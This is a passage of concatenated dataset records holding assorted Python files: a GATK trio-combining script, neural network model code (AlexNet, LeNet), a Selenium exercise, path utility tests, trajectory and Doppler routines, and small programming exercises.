sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n sampleIdIndex = headerList.index(\"sample_id\")\n probandIndex = headerList.index(\"proband\")\n genderIndex = headerList.index(\"sex\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n sampleId = sampleData[sampleIdIndex]\n probandStatus = sampleData[probandIndex]\n gender = sampleData[genderIndex]\n shortName = re.findall(r\"([\\w\\-/]+)\\.?.*\\.?.*\\.gz\", fileName)[0]\n actualFileName = \"{}_test/{}_parsed.vcf.gz\".format(sampleFamilyId, shortName)\n if probandStatus == \"Yes\":\n probandDict[sampleId] = sampleFamilyId\n else:\n if sampleFamilyId not in 
parentDict:\n parentDict[sampleFamilyId] = {sampleId: gender}\n else:\n parentDict[sampleFamilyId][sampleId] = gender\n\n# Create fam files\ndef createFamFiles(proband):\n familyId = probandDict[proband]\n familyDict = parentDict[familyId]\n paternal = \"\"\n maternal = \"\"\n outputString = \"\"\n sampleDict = {}\n for key, value in familyDict.items():\n if value == \"1\":\n paternal = key\n else:\n maternal = key\n with open(inputFile) as sampleFile:\n header = sampleFile.readline()\n headerList = header.rstrip().split(\"\\t\")\n fileNameIndex = headerList.index(\"file_name\")\n familyIdIndex = headerList.index(\"family_id\")\n sampleIdIndex = headerList.index(\"sample_id\")\n probandIndex = headerList.index(\"proband\")\n genderIndex = headerList.index(\"sex\")\n for sample in sampleFile:\n sampleData = sample.rstrip(\"\\n\").split(\"\\t\")\n fileName = sampleData[fileNameIndex]\n sampleFamilyId = sampleData[familyIdIndex]\n sampleId = sampleData[sampleIdIndex]\n probandStatus = sampleData[probandIndex]\n gender = sampleData[genderIndex]\n if probandStatus == \"Yes\" and familyId == sampleFamilyId:\n sampleDict[sampleId] = \"{}\\t{}\\t{}\\t{}\\t{}\\t2\\n\".format(sampleFamilyId, sampleId, paternal, maternal, gender)\n elif probandStatus == \"No\" and familyId == sampleFamilyId:\n sampleDict[sampleId] = \"{}\\t{}\\t0\\t0\\t{}\\t1\\n\".format(sampleFamilyId, sampleId, gender)\n with open(\"{}_test/{}.fam\".format(familyId, familyId), \"w\") as outputFile:\n for key, value in sorted(sampleDict.items()):\n outputFile.write(value)\n\nwith concurrent.futures.ProcessPoolExecutor(max_workers=24) as executor:\n executor.map(createFamFiles, probandDict)\n\nfilesToGenotype = []\n# Use GATK to combine all trios into one vcf\ndef combineTrios(trio):\n files = fileDict[trio]\n fileString = \"\"\n outputName = \"{}_test/{}.vcf.gz\".format(trio, trio)\n for file in files:\n fileString += \"-V {} \".format(file)\n os.system(\"gatk IndexFeatureFile -F {}\".format(file))\n os.system(\"gatk CombineGVCFs -R /references/Homo_sapiens_assembly38.fasta {} -O {}\".format(fileString, outputName))\n return(outputName)\nwith concurrent.futures.ProcessPoolExecutor(max_workers=24) as executor:\n outputName = executor.map(combineTrios, fileDict)\n for file in outputName:\n filesToGenotype.append(file)\n\ntimeElapsedMinutes = round((time.time()-startTime) / 60, 2)\ntimeElapsedHours = round(timeElapsedMinutes / 60, 2)\nprint('{}Trios have been combined. 
Time elapsed: {} minutes ({} hours){}'.format(char, timeElapsedMinutes, timeElapsedHours, char))","sub_path":"combine_trios.py","file_name":"combine_trios.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"188537540","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision\nfrom torchvision import models\nfrom torch.autograd import Variable\n\nfrom mmodel.basic_module import WeightedModule\n\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if (\n classname.find(\"Conv2d\") != -1\n or classname.find(\"ConvTranspose2d\") != -1\n ):\n nn.init.kaiming_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n elif classname.find(\"BatchNorm\") != -1:\n nn.init.normal_(m.weight, 1.0, 0.02)\n nn.init.constant_(m.bias, 0)\n elif classname.find(\"Linear\") != -1:\n nn.init.xavier_normal_(m.weight)\n nn.init.constant_(m.bias, 0)\n\n\nclass LRN(nn.Module):\n def __init__(\n self, local_size=1, alpha=1.0, beta=0.75, ACROSS_CHANNELS=True\n ):\n super(LRN, self).__init__()\n self.ACROSS_CHANNELS = ACROSS_CHANNELS\n if ACROSS_CHANNELS:\n self.average = nn.AvgPool3d(\n kernel_size=(local_size, 1, 1),\n stride=1,\n padding=(int((local_size - 1.0) / 2), 0, 0),\n )\n else:\n self.average = nn.AvgPool2d(\n kernel_size=local_size,\n stride=1,\n padding=int((local_size - 1.0) / 2),\n )\n self.alpha = alpha\n self.beta = beta\n\n def forward(self, x):\n if self.ACROSS_CHANNELS:\n div = x.pow(2).unsqueeze(1)\n div = self.average(div).squeeze(1)\n div = div.mul(self.alpha).add(1.0).pow(self.beta)\n else:\n div = x.pow(2)\n div = self.average(div)\n div = div.mul(self.alpha).add(1.0).pow(self.beta)\n x = x.div(div)\n return x\n\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 96, kernel_size=11, stride=4, padding=0),\n nn.ReLU(inplace=True),\n LRN(local_size=5, alpha=0.0001, beta=0.75),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(96, 256, kernel_size=5, padding=2, groups=2),\n nn.ReLU(inplace=True),\n LRN(local_size=5, alpha=0.0001, beta=0.75),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(256, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, kernel_size=3, padding=1, groups=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1, groups=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\ndef alexnet(pretrained=False, **kwargs):\n r\"\"\"AlexNet model architecture from the\n `\"One weird trick...\" `_ paper.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = AlexNet(**kwargs)\n if pretrained:\n model_path = \"./_PUBLIC_DATASET_/alexnet.pth.tar\"\n pretrained_model = torch.load(model_path)\n model.load_state_dict(pretrained_model[\"state_dict\"])\n return model\n\n\n# convnet without the last layer\nclass AlexNetFc(WeightedModule):\n def __init__(\n self,\n use_bottleneck=True,\n bottleneck_dim=256,\n new_cls=False,\n class_num=1000,\n ):\n super(AlexNetFc, self).__init__()\n model_alexnet = alexnet(pretrained=True)\n 
self.has_init = True\n self.features = model_alexnet.features\n self.classifier = nn.Sequential()\n for i in range(6):\n self.classifier.add_module(\n \"classifier\" + str(i), model_alexnet.classifier[i]\n )\n self.feature_layers = nn.Sequential(self.features, self.classifier)\n\n self.use_bottleneck = use_bottleneck\n self.new_cls = new_cls\n if new_cls:\n if self.use_bottleneck:\n self.bottleneck = nn.Linear(4096, bottleneck_dim)\n self.fc = nn.Linear(bottleneck_dim, class_num)\n self.bottleneck.apply(init_weights)\n self.fc.apply(init_weights)\n self.__in_features = bottleneck_dim\n else:\n self.fc = nn.Linear(4096, class_num)\n self.fc.apply(init_weights)\n self.__in_features = 4096\n else:\n self.fc = model_alexnet.classifier[6]\n self.__in_features = 4096\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.classifier(x)\n if self.use_bottleneck and self.new_cls:\n x = self.bottleneck(x)\n y = self.fc(x)\n return x, y\n\n\nclass AlexNetFeatureExtractor(WeightedModule):\n def __init__(self):\n super(AlexNetFeatureExtractor, self).__init__()\n\n model_alexnet = alexnet(pretrained=True)\n self.features = model_alexnet.features\n self.classifier = nn.Sequential()\n for i in range(6):\n self.classifier.add_module(\n \"classifier\" + str(i), model_alexnet.classifier[i]\n )\n\n self.output_dim = 4096\n self.has_init = True\n\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n feature = self.classifier(x)\n return feature\n\n","sub_path":"mmodel/utils/thuml_feature_extractor.py","file_name":"thuml_feature_extractor.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"80495828","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nimport math\nimport time\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://suninjuly.github.io/explicit_wait2.html\")\n\n\nprice = WebDriverWait(browser, 12).until(\n expected_conditions.text_to_be_present_in_element((By.ID, \"price\"),'100')\n)\nbutton1 = browser.find_element(By.ID, \"book\")\nbutton1.click()\n\nelement = browser.find_element_by_id(\"input_value\")\nx = int(element.text)\ny = calc(x)\n\ninput = browser.find_element_by_id(\"answer\")\ninput.send_keys(y)\n\nbutton2 = browser.find_element(By.ID, \"solve\")\nbutton2.click()\n\ntime.sleep(30)\nbrowser.quit()\n","sub_path":"Selenium/block2/block2_lesson4_ex1.py","file_name":"block2_lesson4_ex1.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"143607111","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport re\n\nfrom six import text_type\n\nfrom clldutils.testing import WithTempDir, capture_all\n\n\nclass Tests(WithTempDir):\n def make_file(self, name):\n path = self.tmp_path(name)\n with path.open('w') as fp:\n fp.write('test')\n return path\n\n def test_import_module(self):\n from clldutils.path import import_module\n\n with self.tmp_path('__init__.py').open('w', encoding='ascii') as fp:\n fp.write('A = [1, 2, 3]')\n\n m = import_module(self.tmp_path())\n self.assertEqual(len(m.A), 3)\n\n with self.tmp_path('mod.py').open('w', encoding='ascii') as fp:\n fp.write('A = [1, 2, 3]')\n\n m = 
import_module(self.tmp_path('mod.py'))\n self.assertEqual(len(m.A), 3)\n\n def test_non_ascii(self):\n from clldutils.path import Path, path_component, as_unicode\n\n p = Path(path_component('äöü')).joinpath(path_component('äöü'))\n self.assertIsInstance(as_unicode(p), text_type)\n self.assertIsInstance(as_unicode(p.name), text_type)\n\n def test_as_posix(self):\n from clldutils.path import as_posix, Path\n\n self.assertRaises(ValueError, as_posix, 5)\n self.assertEquals(as_posix('.'), as_posix(Path('.')))\n\n def test_md5(self):\n from clldutils.path import md5\n\n self.assertIsNotNone(re.match('[a-f0-9]{32}$', md5(__file__)))\n\n def test_copytree(self):\n from clldutils.path import copytree\n\n dst = self.tmp_path('a', 'b')\n copytree(self.tmp_path(), dst)\n self.assertTrue(dst.exists())\n self.assertRaises(OSError, copytree, dst, dst)\n\n def test_copy(self):\n from clldutils.path import copy\n\n src = self.make_file('test')\n dst = self.tmp_path('other')\n copy(src, dst)\n self.assertEquals(src.stat().st_size, dst.stat().st_size)\n\n def test_move(self):\n from clldutils.path import move\n\n dst = self.tmp_path('a')\n dst.mkdir()\n src = self.make_file('test')\n move(src, dst)\n self.assertFalse(src.exists())\n self.assertTrue(dst.joinpath(src.name).exists())\n\n def test_remove(self):\n from clldutils.path import remove\n\n self.assertRaises(OSError, remove, self.tmp_path('nonexistingpath'))\n tmp = self.make_file('test')\n self.assertTrue(tmp.exists())\n remove(tmp)\n self.assertFalse(tmp.exists())\n\n def test_rmtree(self):\n from clldutils.path import rmtree\n\n self.assertRaises(OSError, rmtree, self.tmp_path('nonexistingpath'))\n rmtree(self.tmp_path('nonexistingpath'), ignore_errors=True)\n tmp = self.tmp_path('test')\n tmp.mkdir()\n self.assertTrue(tmp.exists())\n rmtree(tmp)\n self.assertFalse(tmp.exists())\n\n def test_walk(self):\n from clldutils.path import walk\n\n d = self.tmp_path('testdir')\n d.mkdir()\n self.make_file('testfile')\n res = [p.name for p in walk(self.tmp_path(), mode='files')]\n self.assertNotIn('testdir', res)\n self.assertIn('testfile', res)\n res = [p.name for p in walk(self.tmp_path(), mode='dirs')]\n self.assertIn('testdir', res)\n self.assertNotIn('testfile', res)\n\n def test_git_describe(self):\n from clldutils.path import git_describe\n\n d = self.tmp_path('testdir')\n self.assertRaises(ValueError, git_describe, d)\n d.mkdir()\n with capture_all(git_describe, d) as res:\n self.assertEqual(res[0], 'testdir')\n\n def test_TemporaryDirectory(self):\n from clldutils.path import TemporaryDirectory\n\n with TemporaryDirectory() as tmp:\n assert tmp.exists()\n assert not tmp.exists()\n","sub_path":"clldutils/tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"403360790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 30 11:59:47 2020\n\n@author: Seo\n\"\"\"\n\nimport time\nimport numpy as np\nimport cupy as cp\n\ndef createLinearTrajectory(pos1, pos2, stepArray, pos_start=None, randomWalk=None):\n '''\n Parameters\n ----------\n pos1 : Numpy array, 1-D.\n Anchor position 1. Starting position defaults to this.\n pos2 : Numpy array, 1-D.\n Anchor position 2.\n stepArray : Numpy array, 1-D.\n Array of steps. Each point will move by step * directionVectorNormed. 
Does not need to be equally spaced.\n pos_start : Scalar between [0,1], optional\n The default is None.\n The output will use this as the coefficient along the connecting vector between\n the 2 anchor points, as the position to start iterating at.\n randomWalk : Scalar, optional\n The default is None.\n Adds random noise around the trajectory using a normal distribution.\n\n Returns\n -------\n Matrix of column vectors of positions along the trajectory.\n For steps which exceed the 2nd anchor point, the direction reverses i.e.\n the trajectory is constructed as a bounce between the two anchor points.\n '''\n \n if pos_start is None:\n pos0 = pos1\n else:\n raise NotImplementedError\n \n result = np.zeros((len(pos1), len(stepArray)))\n finalStepArray = np.zeros(stepArray.shape)\n \n dirVec = pos2 - pos1\n anchorDist = np.linalg.norm(dirVec)\n dirVecNormed = dirVec / np.linalg.norm(dirVec)\n # revDirVecNormed = -dirVecNormed\n \n lengthsCovered = np.floor(stepArray / anchorDist)\n idxReverse = np.argwhere(lengthsCovered%2==1).flatten()\n \n # in these indices, calculate the remaining length\n remainderLen = np.remainder(stepArray[idxReverse], anchorDist)\n \n # these are removed from the full length to induce the backward motion from the 2nd anchor point\n finalStepArray[idxReverse] = anchorDist - remainderLen \n \n # for forward we do the same\n idxForward = np.argwhere(lengthsCovered%2==0).flatten()\n \n remainderForwardLen = np.remainder(stepArray[idxForward], anchorDist)\n \n finalStepArray[idxForward] = remainderForwardLen\n \n # now calculate the values\n displacements = dirVecNormed.reshape((-1,1)) * finalStepArray.reshape((1,-1))\n \n result = pos0.reshape((-1,1)) + displacements\n \n return result\n\ndef createCircularTrajectory(totalSamples, r_a=100000.0, desiredSpeed=100.0, r_h=300.0, sampleTime=3.90625e-6, phi=0): \n # initialize a bunch of rx points in a circle in 3d\n dtheta_per_s = desiredSpeed/r_a # rad/s\n arcangle = totalSamples * sampleTime * dtheta_per_s # rad\n r_theta = np.arange(phi,phi+arcangle,dtheta_per_s * sampleTime)[:totalSamples]\n \n r_x_x = r_a * np.cos(r_theta)\n r_x_y = r_a * np.sin(r_theta)\n r_x_z = np.zeros(len(r_theta)) + r_h\n r_x = np.vstack((r_x_x,r_x_y,r_x_z)).transpose()\n \n r_xdot_x = r_a * -np.sin(r_theta) * dtheta_per_s\n r_xdot_y = r_a * np.cos(r_theta) * dtheta_per_s\n r_xdot_z = np.zeros(len(r_theta))\n r_xdot = np.vstack((r_xdot_x,r_xdot_y,r_xdot_z)).transpose()\n \n return r_x, r_xdot, arcangle, dtheta_per_s\n\n\ndef calcFOA(r_x, r_xdot, t_x, t_xdot, freq=30e6):\n '''\n Expects individual row vectors.\n All numpy array shapes expected to match.\n \n Assumed that arrays are either all cupy arrays or all numpy arrays,\n operates agnostically using cupy/numpy.\n '''\n xp = cp.get_array_module(r_x)\n \n lightspd = 299792458.0\n \n radial = t_x - r_x # convention pointing towards transmitter\n radial_n = radial / xp.linalg.norm(radial,axis=1).reshape((-1,1)) # don't remove this reshape, nor the axis arg\n \n if radial_n.ndim == 1:\n vradial = xp.dot(radial_n, r_xdot) - xp.dot(radial_n, t_xdot) # minus or plus?\n else:\n # vradial = np.zeros(len(radial_n))\n # for i in range(len(radial_n)):\n # vradial[i] = np.dot(radial_n[i,:],r_xdot[i,:]) - np.dot(radial_n[i,:], t_xdot[i,:])\n \n # make distinct numpy calls instead of the loop\n dot_radial_r = xp.sum(radial_n * r_xdot, axis=1)\n dot_radial_t = xp.sum(radial_n * t_xdot, axis=1)\n vradial = dot_radial_r - dot_radial_t\n\n foa = vradial/lightspd * freq\n\n return foa\n\ndef 
createTriangularSpacedPoints(numPts: int, dist: float=1.0, startPt: np.ndarray=np.array([0,0])):\n '''\n Spawns locations in a set, beginning with startPt. Each location is spaced \n 'dist' apart from any other location, e.g.\n \n 2 1\n \n 3 O 0\n \n 4 5\n \n The alignment is in the shape of triangles. The order of generation is anticlockwise as shown.\n \n '''\n \n if numPts < 2:\n raise Exception(\"Please specify at least 2 points.\")\n \n origin = np.array([0.0,0.0])\n \n ptList = [origin]\n \n dirVecs = np.array([[1.0,0.0],\n [0.5,np.sqrt(3)/2],\n [-0.5,np.sqrt(3)/2],\n [-1.0,0.0],\n [-0.5,-np.sqrt(3)/2],\n [0.5,-np.sqrt(3)/2],\n [1.0,0.0]]) * dist # cyclical to ensure indexing later on\n \n layer1ptr = 0\n turnLayer = 0\n i = 1\n while i < numPts:\n idx = i - 1 # we go back to 0-indexing\n \n # test for layer\n layer = 1\n while idx >= (layer+1)*(layer/2)*6:\n layer += 1\n \n # print(\"i: %d, idx: %d, layer: %d\"% (i,idx,layer)) # verbose index printing\n \n if layer == 1: # then it's simple, just take the genVec and propagate\n newPt = origin + dirVecs[idx]\n ptList.append(newPt)\n i += 1\n else:\n # use the pointer at layer 1\n layerptr = origin + dirVecs[layer1ptr]\n \n if turnLayer == 0: # go straight all the way\n for d in range(layer-1):\n layerptr = layerptr + dirVecs[layer1ptr]\n ptList.append(np.copy(layerptr))\n turnLayer = layer - 1 # now set it to turn\n else:\n for d in range(turnLayer-1): # go straight for some layers\n layerptr = layerptr + dirVecs[layer1ptr]\n for d in range(layer - turnLayer):\n layerptr = layerptr + dirVecs[layer1ptr+1]\n ptList.append(np.copy(layerptr))\n turnLayer = turnLayer - 1 # decrement\n if turnLayer == 0: # if we have hit turnLayer 0, time to move the layer1ptr\n layer1ptr = (layer1ptr + 1) % 6\n \n \n i+=1\n \n # swap to array for cleanliness\n ptList = np.array(ptList)\n ptList = ptList + startPt # move the origin\n\n return ptList\n \n ","sub_path":"trajectoryRoutines.py","file_name":"trajectoryRoutines.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"587713224","text":"import theano\r\nfrom theano import tensor as T\r\nfrom theano.tensor.nnet import conv2d\r\nimport numpy\r\n\r\n# initialize shared variable for weights with random values from \r\n# uniform dist weights whose shape is 4d. \r\n# 0. feature maps at layer m, (which is 2 conv filters)\r\n# 1. feature maps at m-1 (in this case 3 RGB channels)\r\n# 2. filter height, \r\n# 3. filter width\r\n\r\n# b.dimshuffle('x', 0, 'x', 'x') simply reshapes b into a 4d array \r\n# whose shape is ('x', 2, 'x', 'x') where 'x' is arbitrary. This\r\n# allows us to do elementwise operations with b since conv_out is 4d\r\n# Note: conv_out + b.dimshuffle(...) 
is the same thing as adding a \r\n# bias to each hidden unit.\r\n\r\nfrom theano.tensor.signal import pool\r\n\r\n## Rewriting the above as object-oriented\r\n\r\nclass LeNetConvPoolLayer(object):\r\n \"\"\" Convolution -> Pool output layer \r\n \r\n === Attributes ===\r\n\r\n @type W: theano.tensor.sharedvariable\r\n @type b: theano.tensor.sharedvariable\r\n @type params: list[self.W, self.b]\r\n @type input_: numpy.ndarray\r\n @type output_: numpy.ndarray\r\n \"\"\"\r\n def __init__(self, rng, input_, filter_shape, image_shape, poolsize=(2,2)):\r\n \"\"\"Create shared variables within a LeNetConvPoolLayer object\r\n\t@type rng: numpy.random.RandomState\r\n\t random number generator for weight initialization\r\n\t@type input_: theano.tensor.dtensor4\r\n\t symbolic image tensor of shape image_shape (4d)\r\n\t@type filter_shape: tuple or list of length 4\r\n\t (num of filters:layer m, num input feature maps: layer m-1, \r\n\t filter height, filter width)\r\n\t@type image_shape: tuple or list of length 4\r\n\t (batch size, num input feature maps,\r\n\t image height, image width)\r\n\t@type poolsize: tuple of length 2\r\n\t indicates the filter size to downsample\r\n\t\"\"\"\r\n\t# check if num input feature maps match\r\n assert image_shape[1] == filter_shape[1]\r\n self.input_ = input_\r\n\t\r\n\t# OPTIMALLY INITIALIZE WEIGHTS STEP: specific interval with uniform dist.\r\n\t# we know each hidden unit has this many inputs:\r\n\t# (num input feature maps*filter height*filter width)\r\n\t# We need to get bounds for tanh\r\n fan_in = numpy.prod(filter_shape[1:])\r\n\t# each unit in lower layer receives gradient from:\r\n\t# (num OUTPUT feature maps * filter height * filter width / poolsize)\r\n fan_out = (filter_shape[0] * numpy.prod(filter_shape[2:]) / numpy.prod(poolsize))\r\n\t# initialize weights with random weights (weight should be the same as the filter shape)\r\n W_bound = numpy.sqrt(6. / (fan_in + fan_out))\r\n self.W = theano.shared(numpy.asarray(rng.uniform(low=-W_bound, high=W_bound, size=filter_shape), dtype=theano.config.floatX), borrow=True)\r\n\r\n\t# CREATE BIAS 1D TENSOR - one for each output feature map (layer m)\r\n b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)\r\n self.b = theano.shared(value=b_values, borrow=True)\r\n\r\n\t# CONVOLUTION STEP: input feature maps with filters\r\n conv_out = conv2d(\r\n input=input_,\r\n filters=self.W,\r\n filter_shape=filter_shape,\r\n input_shape=image_shape\r\n )\r\n\t\r\n\t# POOLING STEP: pool each feature map individually with maxpooling\r\n pool_out = theano.tensor.signal.pool.pool_2d(\r\n input=conv_out,\r\n ds=poolsize, # ds: downsample size\r\n ignore_border=True\r\n )\r\n\r\n\t# ACTIVATION STEP: We need to add bias to pool_out but since pool_out is a 4D tensor, \r\n\t# we need to reshape the bias to be 4D tensor of shape (1, num filters, 1, 1) and then\r\n\t# broadcast it such that it becomes (batchsize, num filter, height, width)\r\n self.output_ = T.tanh(pool_out + self.b.dimshuffle('x', 0, 'x', 'x'))\r\n\t\r\n\t# store parameters for analysis\r\n self.params = [self.W, self.b]\r\n self.input_ = input_\r\n\r\n\t\r\n","sub_path":"LeNetConvPoolLayer.py","file_name":"LeNetConvPoolLayer.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4706745","text":"# Given two .txt files that have lists of numbers in them, find the numbers that are\n# overlapping. 
One .txt file has a list of all prime numbers under 1000, and the other\n# .txt file has a list of happy numbers up to 1000.\ndef main():\n    print(overlapping_numbers_txt('primenumbers', 'happynumbers'))\n\ndef load_file(file):\n    with open(file + '.txt', 'r') as open_file:\n        return open_file.read().split()\n\n\ndef overlapping_numbers_txt(file_a, file_b):\n    file_a = load_file(file_a)\n    file_b = load_file(file_b)\n    overlap_list = []\n    for linha_a in file_a:\n        if linha_a in file_b:\n            overlap_list.append(linha_a)\n    return overlap_list\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"23 File Overlap/file_overlap.py","file_name":"file_overlap.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"438494019","text":"'''\nProblem \"Negative power\"\nStatement\nYou are given a positive real number a and an integer n.\n\nCompute a^n. Write your solution as a function power(a, n).\n\nUsing the built-in exponentiation function is not allowed.\n'''\n\n\ndef power(a, n):\n    res = 1\n    n1 = abs(n)\n    if n > 0:\n        for i in range(1, int(n1) + 1):\n            res *= a\n        return res\n    else:\n        for i in range(1, int(n1) + 1):\n            res *= 1 / a\n        return res\n\n\na = float(input())\nn = float(input())\nprint(power(a, n))\n\n\n# The course developers' reference solution\ndef power(a, n):\n    res = 1\n    for i in range(abs(n)):\n        res *= a\n    if n >= 0:\n        return res\n    else:\n        return 1 / res\n\n\nprint(power(float(input()), int(input())))\n","sub_path":"001703StepPyStudy/Step001703PyStudyсh08_func_recurs_TASK02_20210224_negPow.py","file_name":"Step001703PyStudyсh08_func_recurs_TASK02_20210224_negPow.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"13197157","text":"\nclass QueueNode(object):\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n    \n\n'''\nadd to LAST end, remove from FIRST end\nFIRST -> a -> b -> c -> LAST \n'''\nclass Queue(object):\n    def __init__(self):\n        self.first = None\n        self.last = None\n\n    def add(self, data):\n        item = QueueNode(data)\n        if (self.last != None):\n            self.last.next = item\n        self.last = item\n        if (self.first == None):\n            self.first = item\n    \n    def remove(self):\n        if (self.first == None):\n            raise Exception(\"no first element\")\n        data = self.first.data\n        self.first = self.first.next\n        if (self.first == None):\n            # update last in case we've gotten to the point where there's only 1 item left\n            self.last = None\n        return data \n    \n    def peek(self):\n        if (self.first == None):\n            raise Exception(\"no first element\")\n        return self.first.data\n\nif (__name__ == '__main__'):\n    print(\"doing some basic testing on queue implementation...\")\n    q = Queue()\n    q.add(1)\n    q.add(2)\n    q.add(3)\n    item = q.remove()\n    assert(item == 1)\n    item = q.remove()\n    assert(item == 2)\n    first = q.peek()\n    assert(first == 3)\n    item = q.remove()\n    assert(item == 3)\n    print(\"tests all passed\")\n    \n","sub_path":"data_structures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"419891599","text":"from sys import argv\r\nfrom os.path import exists\r\n\r\nscript, fromFile, toFile = argv\r\n\r\nprint(f\"Copying from {fromFile} to {toFile}\")\r\n\r\ninFile = open(fromFile)\r\ninData = inFile.read()\r\n\r\nprint(\"The input file is \", len(inData), \" bytes long\")\r\n\r\nprint(\"Does the outfile exist? 
\", exists(toFile))\r\nprint(\"Ready, hit RETURN to continue or CTRL-C to exit.\")\r\ninput(\"< \")\r\n\r\noutFile = open(toFile, 'w')\r\noutFile.write(inData)\r\n\r\nprint(\"all done\")\r\n\r\noutFile.close()\r\ninFile.close()","sub_path":"ex17_Copy_File.py","file_name":"ex17_Copy_File.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"563071511","text":"# bounds on serving size for a package\n# (500, 450) -> (1, 1)\n# (10, 55) -> (5, 6)\n\n# 1 2 3 4 5 6\n# 9x 9 18 27 36 45 54\n# 11x 11 22 33 44 55 66\n\ndef lower(need, package):\n # Find the largest x such that 0.9 * x * need <= package <= 1.1 * x * need\n lo = 0\n hi = int(1e8)\n while lo + 1 < hi:\n mid = (lo + hi) // 2\n if 10 * package <= 11 * mid * need:\n hi = mid\n else:\n lo = mid\n\n return hi\n\ndef upper(need, package):\n # Find the largest x such that 0.9 * x * need <= package <= 1.1 * x * need\n lo = 0\n hi = int(1e8)\n while lo + 1 < hi:\n mid = (lo + hi) // 2\n if 9 * mid * need <= 10 * package:\n lo = mid\n else:\n hi = mid\n\n return lo\n\ndef get_bounds(need, package):\n l = lower(need, package)\n u = upper(need, package)\n if l <= u:\n return (l, u)\n\ndef intersect(a, b):\n if a[0] > b[1] or a[1] < b[0]:\n return None\n\n return (max(a[0], b[0]), min(a[1], b[1]))\n\ndef has_intersection(ints):\n a = ints[0]\n for i in ints:\n if a is None:\n break\n a = intersect(a, i)\n\n return a is not None\n\ndef solve():\n n, p = map(int, input().split())\n req = list(map(int, input().split()))\n have = [list(map(int, input().split())) for _ in range(n)]\n\n for i in range(n):\n new_row = []\n for j in range(p):\n t = get_bounds(req[i], have[i][j])\n if t is not None:\n new_row.append(t)\n\n have[i] = new_row\n have[i].sort()\n\n ptrs = [0 for _ in range(n)]\n ans = 0\n while all(ptrs[i] < len(have[i]) for i in range(n)):\n if has_intersection([have[i][ptrs[i]] for i in range(n)]):\n ptrs = [x + 1 for x in ptrs]\n ans += 1\n else:\n move = 0\n for i in range(n):\n if have[i][ptrs[i]][1] < have[move][ptrs[move]][1]:\n move = i\n\n ptrs[move] += 1\n\n return ans\n\ndef main():\n t = int(input())\n for tt in range(t):\n print('Case #{}: {}'.format(tt + 1, solve()))\n\nmain()\n","sub_path":"gcj/2017rd1a/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"433432021","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom collections import defaultdict\nimport pandas as pd\nimport math\n\n\ninpdir = '../output/timeout'\ntimeout = [10,30,60,180,360]\ndata = defaultdict(lambda:[np.nan]*len(timeout))\nfor path in os.listdir(inpdir):\n s = path.split('_')\n model = s[0]\n with open(os.path.join(inpdir, path), 'r') as f:\n score = 